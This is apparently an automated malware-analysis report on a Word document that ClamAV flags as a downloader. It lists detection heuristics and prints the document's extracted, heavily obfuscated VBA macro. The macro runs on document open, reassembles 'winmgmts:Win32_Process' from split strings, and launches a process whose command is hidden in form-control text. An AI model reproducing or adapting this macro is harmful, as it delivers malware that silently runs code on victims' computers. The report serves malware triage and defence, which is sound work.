MALICIOUS

Risk Score: 232
Heuristics: 8

- ClamAV: Doc.Downloader.Generic-7448061-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Downloader.Generic-7448061-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings). Document contains VBA macro code.
- Dangerous API name reassembled from split string literals (critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION). VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning. Matched line in script: `Set Xorfiqlkxxed = CreateObject(Tcoqcohzvycm)`
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: `Set Xorfiqlkxxed = CreateObject(Tcoqcohzvycm)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Document_Open macro (low, OLE_VBA_DOCOPEN). Matched line in script: `Private Sub Document_open()`
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts: 1

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8787 bytes |

SHA-256: 6224f6e44f0607c29f92e3ded3a45283c036abce0ae8176dd31fc8c9989fb4ec

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 147 of 220 identifiers look randomly generated (e.g. 'Mbrphbftghjdj'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "Jmijjjwz"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Cmsodkagln, 0, 0, MSForms, TextBox"
Private Sub Document_open()
For Psnacbyoo = Rgvuodzcz To 0
For Mvjndaabwfub = Zholwhlfadbih To 0
Xisxvfsroxx = (23 + Round(WOJOkxR3))
Next
Mcxeovowkr = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Jgufmvtdkzwbe = uzH To MZDUoaj1
Hqanytysxgwt = ChrB(dANsZ68a4)
Next
For Umqpymzxl = 0 To 0
Ekbnfvad = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
For Kxulerbclz = Puctncuztox To 0
For Qgkfgaojbi = Cenmqazu To 0
Zxvkgosrvadc = (23 + Round(WOJOkxR3))
Next
Qxfznenlqq = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Gndoxwtugnkwt = uzH To MZDUoaj1
Kmkzapcvtva = ChrB(dANsZ68a4)
Next
For Ingeziieoh = 0 To 0
Itedmigon = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
For Mvaayvvxtcp = Wmagdsmafqo To 0
For Jbpcxwaxve = Ecrjmdckv To 0
Qkwjfogflvm = (23 + Round(WOJOkxR3))
Next
Hqetxqaixazq = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Tnluqroysam = uzH To MZDUoaj1
Oyrlrpxbvy = ChrB(dANsZ68a4)
Next
For Eqetkxskxn = 0 To 0
Awufjyeg = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Swumbowaigdjf
End Sub
Attribute VB_Name = "Sfonhqibzw"
Attribute VB_Base = "0{9B2A4338-B897-444A-A779-B143BA992B4A}{0B3CF45D-5FD6-4949-84A1-381C66AD4230}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Tebeqsmzwihuh"
Function Trtzyboghqnv()
For Bxogtrqcts = Alimqjauxwg To 0
For Liyszzwmf = Htagilcws To 0
Rnputrxleqb = (23 + Round(WOJOkxR3))
Next
Jrkuscfvh = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Witmlukuk = uzH To MZDUoaj1
Kcffeotyqgs = ChrB(dANsZ68a4)
Next
For Qbidqptkmkxlx = 0 To 0
Kghqltghomxqb = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Tmtfgqwh = Jmijjjwz.Cmsodkagln
For Wgzpadmybl = Cnrnhbzgi To 0
For Wjllttkzdeodw = Mmfsjkax To 0
Wlylejcegcgp = (23 + Round(WOJOkxR3))
Next
Eqlgcojvfdpm = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Hpwmrsxhlny = uzH To MZDUoaj1
Ypfxxunnsy = ChrB(dANsZ68a4)
Next
For Fiafvwsimwqg = 0 To 0
Zuwfxhhdkfags = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Knkdvjkxc = Tmtfgqwh + Sfonhqibzw.Ugpgpbkc + Sfonhqibzw.Xhxonjbodqlbv + Sfonhqibzw.Ryxzseahphsba
For Ultxoocklbbyg = Ybbvwntudqn To 0
For Eesypcuel = Nvqbeppomfbnd To 0
Mbrphbftghjdj = (23 + Round(WOJOkxR3))
Next
Knodibwrpnb = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Dcqoypqsmvfw = uzH To MZDUoaj1
Jtvmfkvu = ChrB(dANsZ68a4)
Next
For Arypjcbfckqdq = 0 To 0
Uoyxrjgaz = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Nceizhcj = Knkdvjkxc + Sfonhqibzw.Gwfpippqq + Sfonhqibzw.Hwekonmzcqemd.ControlTipText
For Jijyehojw = Fyxhvxunhkq To 0
For Ethplpqakc = Ctymaibhnorh To 0
Tjfcysryu = (23 + Round(WOJOkxR3))
Next
Zygzovvp = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Ewagbpjypbzj = uzH To MZDUoaj1
Hvhepceynmbku = ChrB(dANsZ68a4)
Next
For Svrrppnevwdia = 0 To 0
Apvkrsoral = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Trtzyboghqnv = Oghweyfyl + Nceizhcj + Oghweyfyl
For Uohhudctbpsxz = Dzyiocbkvfgdg To 0
For Dgafhfvcppq = Xtzqkzycovw To 0
Dlbnavkolmxu = (23 + Round(WOJOkxR3))
Next
Hwjsyumncgq = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Kkokdhocj = uzH To MZDUoaj1
Ovxalhcw = ChrB(dANsZ68a4)
Next
For Qgfcydgqjv = 0 To 0
Nzexbumuo = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
End Function
Function Swumbowaigdjf()
For Bqsuuznsbus = Waajezzwshldj To 0
For Fkadlbagc = Obciokfvokioi To 0
Rjjgqlvfnq = (23 + Round(WOJOkxR3))
Next
Kuvtyfilytk = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Xnpxxwre = uzH To MZDUoaj1
Rxvmksvpru = ChrB(dANsZ68a4)
Next
For Asqkiannxyrf = 0 To 0
Gipucklkewctx = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Tcoqcohzvycm = "wi" + "nmgmt" + "s:" + "Win3" + "2_" + Jmijjjwz.Cmsodkagln + "r" + "oc" + "ess" + I
For Jscdworowpl = Znaoziwy To 0
For Zdtzidcie = Ifgjhjxge To 0
Zpbpcywh = (23 + Round(WOJOkxR3))
Next
Jmcacpikthgo = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Iufsyyrvczde = uzH To MZDUoaj1
Bemwnnysdieu = ChrB(dANsZ68a4)
Next
For Kvtlsjhitdjma = 0 To 0
Cwyrpiovja = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Set Xorfiqlkxxed = CreateObject(Tcoqcohzvycm)
For Onmmjjcnfdqx = Zxlehnpsmypzd To 0
For Qaokwrju = Lzbofjjugek To 0
Okdvanxkfrlpd = (23 + Round(WOJOkxR3))
Next
Rfqcwrvnoeh = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Fwgrjeazt = uzH To MZDUoaj1
Hrdghpych = ChrB(dANsZ68a4)
Next
For Anikeswo = 0 To 0
Yqeilufzbnxj = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Jphbvyvkrq = Tcoqcohzvycm + Sfonhqibzw.Jacvjxbrbumto.ControlTipText + Sfonhqibzw.Tkwjxcncrrwa.ControlTipText
For Clxnmlbdcl = Ymodgheqprq To 0
For Kuuitift = Rfisctofsfbum To 0
Pczsvkuyjcq = (23 + Round(WOJOkxR3))
Next
Jdbtxnwyxpbx = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Yscpiqrdff = uzH To MZDUoaj1
Oxgypmmuw = ChrB(dANsZ68a4)
Next
For Hxzgrrmx = 0 To 0
Ywghmircfxws = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Luwrpdeedtxj = Jphbvyvkrq + Jmijjjwz.Cmsodkagln
For Hnhfjfmoxntcy = Glpxtyixl To 0
For Qgcyxprjb = Cngdbbcmdp To 0
Uirbczypvyco = (23 + Round(WOJOkxR3))
Next
Yqekopwujb = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Whvzdsymhqg = uzH To MZDUoaj1
Kdvpdlrwpdm = ChrB(dANsZ68a4)
Next
For Acxazpllcruw = 0 To 0
Queijqvdla = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Set Swumbowaigdjf = CreateObject(Luwrpdeedtxj)
For Ifwpdkeecqwix = Aaefgxzqmj To 0
For Whiblyygtvgfv = Qnweyjeklt To 0
Aipjfhlhw = (23 + Round(WOJOkxR3))
Next
Lkzcteuzkmo = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Pfxpsxxi = uzH To MZDUoaj1
Yxdmbxjmnxzl = ChrB(dANsZ68a4)
Next
For Gkgrtyulamtzk = 0 To 0
Zwfirafprtb = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Swumbowaigdjf.XSize = False
For Nazpejcx = Uwpgdhswdy To 0
For Mfuhjtxq = Pvdopmibidbqn To 0
Atalffkpjo = (23 + Round(WOJOkxR3))
Next
Xziarxwgucpr = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Cpkbvrevjax = uzH To MZDUoaj1
Sfguavrlb = ChrB(dANsZ68a4)
Next
For Ksrjrxei = 0 To 0
Duehscqbqidm = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Swumbowaigdjf.YSize = False
For Sqelhflkxztt = Idungqxnp To 0
For Hhmgdbhgbomji = Vienrgextdez To 0
Xfbtmayzetx = (23 + Round(WOJOkxR3))
Next
Qtwumgnvpic = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Cjsczcfrdjlq = uzH To MZDUoaj1
Uvdlpftnd = ChrB(dANsZ68a4)
Next
For Ssntixyaux = 0 To 0
Buugvnkkd = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Do While Xorfiqlkxxed.Create(Null & Trtzyboghqnv, Xihomhlcufq, Swumbowaigdjf)
Loop
For Tekkbgto = Fhgnuvxvttd To 0
For Vqrwnxkkm = Qbgezhutvr To 0
Yjrffjieyyw = (23 + Round(WOJOkxR3))
Next
Kkgrhdstxxso = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Lzjyqlbsmvrfb = uzH To MZDUoaj1
Lrfqlpxncn = ChrB(dANsZ68a4)
Next
For Wblyqmmwfoz = 0 To 0
Srxlzccok = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
End Function
```